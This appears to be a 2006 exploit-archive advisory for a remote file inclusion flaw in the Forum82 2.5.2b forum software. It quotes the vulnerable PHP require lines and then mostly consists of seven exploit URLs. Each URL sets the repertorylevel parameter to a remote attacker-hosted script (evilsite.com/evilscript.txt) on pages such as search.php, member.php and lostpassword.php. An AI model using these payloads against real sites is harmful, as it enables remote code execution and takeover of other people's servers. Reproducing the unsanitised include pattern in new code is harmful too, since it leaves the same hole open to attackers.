Forum82 <= 2.5.2b (repertorylevel) Multiple File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Forum82 <= 2.5.2b (repertorylevel) Multiple File Include Vulnerabilities
# Published : 2006-09-29
# Author : Silahsiz Kuvvetler
# Previous Title : UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit
# Next Title : PPA Gallery <= 1.0 (functions.inc.php) Remote File Include Exploit

#==============================================================================================
#Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities
#===============================================================================================
#                                                                       
#Critical Level : Dangerous                                             
#                                                                       
#Script Dowload : http://www.comscripts.com/jump.php?action=script&id=805
#                                                                       
#Version : v2.5.2b 
#                                                         
#================================================================================================
#
#Bug in : 
#
#almost all files are infected...
#================================================================================================
#
#Vulnerable Code :
#
#		summary & example:
#
#	require($repertorylevel.'include/tables.inc.'.$e);
#       require($repertorylevel.'lang/lang.inc.'.$e);
#       require($repertorylevel.'include/db/mysql.inc.'.$e);
#         
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/search.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/message.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.php3?repertorylevel=http://evilsite.com/evilscript.txt?
#
#bla...bla...
#
#
#
#
#	the script files's are installed as .php3 to website.take care that...
#
#================================================================================================
#Discoverd By : Silahsiz Kuvvetler 
#
#
#Conatact : co-type[at]hotmail[dot]com
#
#GreetZ : FaTTaLGazI - NarcoTic - 0xyGen
#
#
#==================================================================================================

# www.Syue.com [2006-09-29]